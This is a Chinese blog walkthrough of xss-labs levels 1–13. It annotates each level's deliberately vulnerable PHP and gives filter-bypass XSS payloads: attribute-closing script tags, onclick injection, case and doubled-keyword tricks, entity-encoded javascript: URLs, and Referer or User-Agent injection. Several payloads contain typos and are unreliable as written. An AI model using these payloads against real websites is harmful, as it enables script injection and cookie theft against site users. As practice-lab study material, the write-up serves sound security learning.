代码审计之xss-labs_1-13关代码分析

已于 2023-07-23 18:12:06 修改
阅读量179 收藏 1
点赞数
分类专栏: 代码分析 文章标签: xss javascript 前端
于 2022-11-26 21:25:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36585338/article/details/128057442
版权

xss-labs 关卡代码过滤绕过测试

第一关:
#test与网页内容中test相对应,发现能够控制该变量,直接使用xss脚本
#代码分析
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";	//使用GET传参过来并没有对字符串进行过滤
?>
#payload:<script>alert(document.cookie)</script>

第二关:
#使用了.htmlspecialchars()函数将所接受的变量值中特殊字符转化为html实体
#注意闭合字符
#观察网站发现会有一个xss脚本语句,进行闭合引号,将脚本执行出来
#代码分析
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];		//通过GET传参接受参数keyword的值并赋值给变量$str
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
#.htmlspecialchars($str):.htmlspecialchars函数对变量str进行实例化,就是将特殊字符转义为 &2等等
<form action=level2.php method=GET>		//表单提交方式
<input name=keyword  value="'.$str.'">	//输入框,注意变量$str在value值里面,并没有进行过滤防范
#注意value值里面变量两旁有单引号,因此注意封闭引号
<input type=submit name=submit value="搜索"/>	//搜索按钮
</form>
</center>';
?>
#注意js中//为注释
#payload:">'<script>alert(document.cookie)</script>//

第三关:
#发现闭合使用不了了,对其特殊字符都进行了html实体化,也就是对特殊字符进行了转义了
#注意闭合字符
#使用onclick属性触发跨站脚本 'οnclick=alter(xss)
#代码分析
<?php 
ini_set("display_errors", 0);	//是临时关闭PHP的错误显示功能
$str = $_GET["keyword"];		//传参赋值给变量$str
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
#.htmlspecialchars($str):.htmlspecialchars函数对变量str进行实例化,就是将特殊字符转义为 &2等等
<form action=level3.php method=GET>	//表单提交
<input name=keyword  value='".htmlspecialchars($str)."'> //这里对变量$str进行了实例化转义
#这时使用带有特殊字符的js脚本,使用input属性进行绕过转义
<input type=submit name=submit value=搜索 />
</form>
</center>";                                                                                 
?>
#payload:' οnclick='javascript:alert(1)

第四关:
#注意闭合字符
#使用onclick属性触发跨站脚本 οnclick='<script>alter(xss)</script>'
<?php 
ini_set("display_errors", 0);	//暂时不显示php错误
$str = $_GET["keyword"];		//GET传参赋值给变量$str
$str2=str_replace(">","",$str);	//将<使用str_replace函数替换为空
$str3=str_replace("<","",$str2);//将<使用str_replace函数替换为空
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>	//提交方法
<input name=keyword  value="'.$str3.'">	//变量并没有进行过滤,这时注意封闭符号位,直接利用
#使用input属性js脚本利用
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
#payload:"' onclick=javascript:alert(1)>//

第五关:
#将on替换成了o_n
#使用超链接方式进行绕过 "><a href='http://127.0.1'>
#代码分析
<?php 
ini_set("display_errors", 0);	//忽略错误
$str = strtolower($_GET["keyword"]);	//strtolower函数将传参过来的字符转化为小写
$str2=str_replace("<script","<scr_ipt",$str); //替换关键字符script 为 scr_ipt
$str3=str_replace("on","o_n",$str2);	//替换on字符为o_n
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'"> //在传参后进行了替换关键字符,使用其他标签属性绕过
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
#payload:">'<a href="javascript:void(alert(1))

第六关
#将关键字符进行过滤了
#使用大小写绕过
#代码分析
<?php 
ini_set("display_errors", 0);	//忽视php错误
$str = $_GET["keyword"];		//GET传参接受参传给变量$str
$str2=str_replace("<script","<scr_ipt",$str); //替换函数将关键字符替换为scr_ipt              
$str3=str_replace("on","o_n",$str2);//替换函数将关键字符替换为o_n
$str4=str_replace("src","sr_c",$str3);//替换函数将关键字符替换为sr_c
$str5=str_replace("data","da_ta",$str4);//替换函数将关键字符替换为da_ta
$str6=str_replace("href","hr_ef",$str5);//替换函数将关键字符替换为hr_ef
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
#对变量进行了转义,实例化
#发现对常见的一些标签以及属性都进行了替换,但是并没有对大小写进行同一,大小写绕过
<form action=level6.php method=GET>  //表单提交
<input name=keyword  value="'.$str6.'">		//输出的变量
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
#payload:">'<sCRiPt>alert(1)</sCRiPt><

第七关:
#一次过滤
#双写绕过
<?php 
ini_set("display_errors", 0);//忽视错误
$str =strtolower( $_GET["keyword"]);//使用函数将参数转换为小写在传给变量
$str2=str_replace("script","",$str);//替换关键字符为空
$str3=str_replace("on","",$str2);//替换关键字符为空
$str4=str_replace("src","",$str3);//替换关键字符为空
$str5=str_replace("data","",$str4);//替换关键字符为空
$str6=str_replace("href","",$str5);//替换关键字符为空
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
#实例化标签
<form action=level7.php method=GET>	//表单提交
<input name=keyword  value="'.$str6.'">
#发现在GET来接受参数时进行了小写转换,大小写用不了了,但是替换函数只是一次过滤,双写绕过
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
#payload:">'<scrscriptipt>alert(1)</scrscriptipt><

第八关:
#关键字替换,无法大小写绕过
#使用url编码进行绕过
#代码分析
<?php 
ini_set("display_errors", 0);	//忽略php错误
$str = strtolower($_GET["keyword"]);		//小写转换
$str2=str_replace("script","scr_ipt",$str);	//关键字符替换
$str3=str_replace("on","o_n",$str2);//关键字符替换
$str4=str_replace("src","sr_c",$str3);//关键字符替换
$str5=str_replace("data","da_ta",$str4);//关键字符替换
$str6=str_replace("href","hr_ef",$str5);//关键字符替换
$str7=str_replace('"','&quot',$str6);//关键字符替换
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">	//变量实例化
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';	//注意这里变量
?>
#发现这关难度大大提升,不仅统一小写,大多标签都被替换,又进行了转义特殊字符,但是并没有针对加密,加密绕过,注意不一样的网站对应加密是否解析也不一样
#payload:		javascript:alert(1)进行Unicode编码
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

第九关:
#对链接关键字检测,如果没有则不合法 http://
#url编码加//http://绕过		//注释
#代码分析
<?php 
ini_set("display_errors", 0);		//忽视错误
$str = strtolower($_GET["keyword"]);		//大小写统一	小写
$str2=str_replace("script","scr_ipt",$str);	//替换字符
$str3=str_replace("on","o_n",$str2);//替换字符
$str4=str_replace("src","sr_c",$str3);//替换字符
$str5=str_replace("data","da_ta",$str4);//替换字符
$str6=str_replace("href","hr_ef",$str5);//替换字符
$str7=str_replace('"','&quot',$str6);//替换字符
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">	//变量实例化
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))		//判断url链接是否有http:// 合法性
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
#payload:	javascript:alert(1)进行Unicode编码记得最后加上//http://
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

第十关:
#属性隐藏
#onclick加属性type绕过
<?php 
ini_set("display_errors", 0);	//忽视错误
$str = $_GET["keyword"];		//接受参数赋值变量
$str11 = $_GET["t_sort"];		//接受隐藏的参数赋值给变量
$str22=str_replace(">","",$str11);//替换<为空
$str33=str_replace("<","",$str22);//替换>为空
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
#实例化变量	注意这个变量是可以显示的那个
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">	//注意这个隐藏变量	hidden隐藏实现
#绕过方法很简单将这个隐藏的变量属性显示出来
</form>
</center>';
?>
#payload:xxx.xxx.xx?keyword=xx&t_sort="type="text/html"%20onclick=javascripe:alert(1)>//

第十一关:
#接受来源信息
#伪造来源xss脚本
<?php 
ini_set("display_errors", 0);	//忽视错误
$str = $_GET["keyword"];		//接收参数赋值给$str
$str00 = $_GET["t_sort"];		//接收参数赋值给$str00变量,注意这个变量是隐藏的
$str11=$_SERVER['HTTP_REFERER'];	//通过$_server来接受客户端来源赋值给变量$str11
$str22=str_replace(">","",$str11);	//将变量中$str11中含有>替换为空
$str33=str_replace("<","",$str22);	//二次替换	将变量中$str22中含有<替换为空
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
#实例化变量
<form id=search>
<input name="t_link"  value="'.'" type="hidden">	//注意这里并没有输出变量
<input name="t_history"  value="'.'" type="hidden">//注意这里并没有输出变量
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">//这里对变量$st00进行了转义,实例化
<input name="t_ref"  value="'.$str33.'" type="hidden">	//注意这里找到隐藏变量,也就是接受客户端的来源信息
#通过伪造来源中植入xss脚本实施跨站脚本攻击
</form>
</center>';
?>
#payload:	数据包中添加:Referer:" type="text" onclick=javascipt:alert(1)>//

第十二关:
#接受浏览器信息
#伪造浏览器信息xss脚本
#代码分析
<?php 
ini_set("display_errors", 0);	//忽视错误
$str = $_GET["keyword"];		//接收参数
$str00 = $_GET["t_sort"];		//接收参数
$str11=$_SERVER['HTTP_USER_AGENT'];	//接收客户端浏览器信息
$str22=str_replace(">","",$str11);	//替换>为空
$str33=str_replace("<","",$str22);	//替换<为空
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
#实例化变量
<form id=search>
<input name="t_link"  value="'.'" type="hidden">	//空值
<input name="t_history"  value="'.'" type="hidden">//空值
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
#实例化变量值
<input name="t_ua"  value="'.$str33.'" type="hidden">	//隐藏的变量	可以利用
#注意取消隐藏属性		注意封闭符号
#通过伪造来源中植入xss脚本实施跨站脚本攻击
</form>
</center>';
?>                                                                                     
#payload:" type="text" onclick=javascript:alert(1)>//

第十三关:
#简要分析:通过分析代码分析分析输出的变量为cookie值
#代码分析
<?php 
setcookie("user", "call me maybe?", time()+3600);	//setcookie() 函数向客户端发送一个cookie
ini_set("display_errors", 0);	//忽视错误
$str = $_GET["keyword"];		//接收参数
$str00 = $_GET["t_sort"];		//接收参数
$str11=$_COOKIE["user"];		//接收cookie
$str22=str_replace(">","",$str11);	//将接收的cookie的变量进行替换包含>为空
$str33=str_replace("<","",$str22);	//将接收的cookie的变量进行替换包含<为空
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
#实例化变量
<form id=search>
<input name="t_link"  value="'.'" type="hidden">	//空值没啥用
<input name="t_history"  value="'.'" type="hidden">	//空值没啥用
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">//实例化变量
<input name="t_cook"  value="'.$str33.'" type="hidden">	//隐藏的变量,可以利用
#变量$str33是从接收客户端cookie进行输出的		利用时注意将属性显示
</form>
</center>';
?>
#payload:" type="text" onclick=javascript:alert(1)>//
出顾茅庐
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 4898
web靶场-xss-labs靶机平台的搭建和代码审计
XSS-labs 1-13攻略
qq_57861415的博客
01-31 1461
xsslabs 1-13攻略
xss-labs详解(上)1-10
hxhxhxhxx的博客
08-02 1143
xss-labs详解Level 1Level 2htmlspecialcharsLevel 3Level 4Level 5Level 6Level 7Level 8Level 9LevelLevelLevelLevel Level 1 源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-
XSS攻击-xss-lab(1-18)详细讲解
wrypot的博客
03-29 1561
发现单引号前面的内容被赋值给了value,也就是说单引号是value的闭合字符,构造语句开头一个单引号,后面加一个空格(input标签里面属性直接用空格隔开)所以我们接下来要做得事情是,首先&参数t_sort,然后用双引号闭合value值,接着将type类型从hidden隐藏改为text文本,再用onfocus事件触发js语句,最后别忘了,因为我们用双引号闭合了value,所以value本身有的一个双引号多出来了,我们在onfocus="javascript:alert(123)
XSS挑战之旅1-10
weixin_52116519的博客
11-15 1361
XSS漏洞介绍。
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
xss-labs挑战(一) 1
08-08
XSS-labs 挑战(一)1 本文将详细介绍 XSS-labs 挑战(一)1 的知识点,包括挑战的安装、Level 1 无过滤机制、Level 2 闭合标签、Level 3 单引号闭合+htmlspecialchar()函数、Level 4 双引号闭合+添加事件、Level 5...
xss-labs靶场通
最新发布
m0_70349048的博客
02-27 1253
我们发现,当我们更改name等于不同的值时,有不同的返回结果,因此在这里可能有xss漏洞然后直接进行测试,在name后面加入xss攻击语句。
XSS-labs1-20通过手册
rumil的博客
09-21 1705
ng-include指令一般用于包含外部HTML文件,ng-include属性的值可以是一个表达式,返回一个文件名,但是默认情况下,包含的文件需要包含在同一域名下,也就是要调用同一域名下的其他网页。通过代码发现,本卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。被HTML实体编码了,成了实体字符。
xss-labs靶场全通
m0_52051132的博客
10-15 1612
在这里于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs点击图片开始你的xss之旅吧!
xss记录 1-10超详细
weixin_44717303的博客
03-31 573
xss挑战过教程 挑战卡准备环境第一第二第三第四第五第六第七第八第九第十 准备环境 首先需要一个 xss挑战源码 需要准备一个PHPstuday 最后需要一台可以正常联网的电脑 第一 没有任何保护随便一条脚本语句均可 <a href=javascript:/00/,alert(%22M%22)>M</a> 第二 "> <a href=javascript:/00/,alert(%22M%22)>M</a>// 对比
XSS-labs通
em.....
10-24 4246
XSS-labs通 1.第一 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三 ​ ​ 用第二的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
XSS挑战赛--Writeup(共16题)
1stPeak's Blog
06-10 2230
XSS挑战赛--解题思路 Level-1 Level-2 Level-3 Level-4 Level-5 Level-6 Level-7 Level-8 Level-9 Level-10 Level-11 Level-12 Level-13 Level-14 Level-15 Level-16 Level-1 源码: <!DOCTYPE html><!--STATUS OK-...
XSS-Lab笔记
末初的CSDN博客
08-16 594
xss-lab项目地址:https://github.com/rebo-rn/xss-lab xss学习文章:https://wizardforcel.gitbooks.io/xss-naxienian/content/0.html xss-lab在线环境::https://xss.angelo.org.cn/ XSS-Lablevel1level2level3level4level5level6level7level8level9level10level11level12level13level14lev
xsslab记录(11~20)
m0_56375711的博客
12-08 224
xsslab第11~20(白盒测试)
XSS挑战赛(xsslabs)11~16解析
黄乔国PHP
03-07 688
总的来说xsslabs还是很有代表意义的,里面提供了很多绕过和防御XSS的思路。所谓知己知彼在这里面体现的淋漓尽致了。
xss-labs第14
08-18
XSS-labs的第14中,我没有找到相的引用内容来提供详细信息或解答您的问题。 但是,XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台,每个卡都有不同的挑战和漏洞。在第14中,您可能需要利用某种XSS漏洞来完成任务。您可以尝试查看卡的源代码、输入不同的payload来测试和找到漏洞,并以创造性的方式绕过安全措施。请记住,在现实世界中,利用XSS漏洞是违法的行为,请确保您只在合法的环境中进行测试和学习。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [XSS-labs通](https://blog.csdn.net/u010277543/article/details/120937928)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [渗透测试之---xss-labs闯【1-14】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值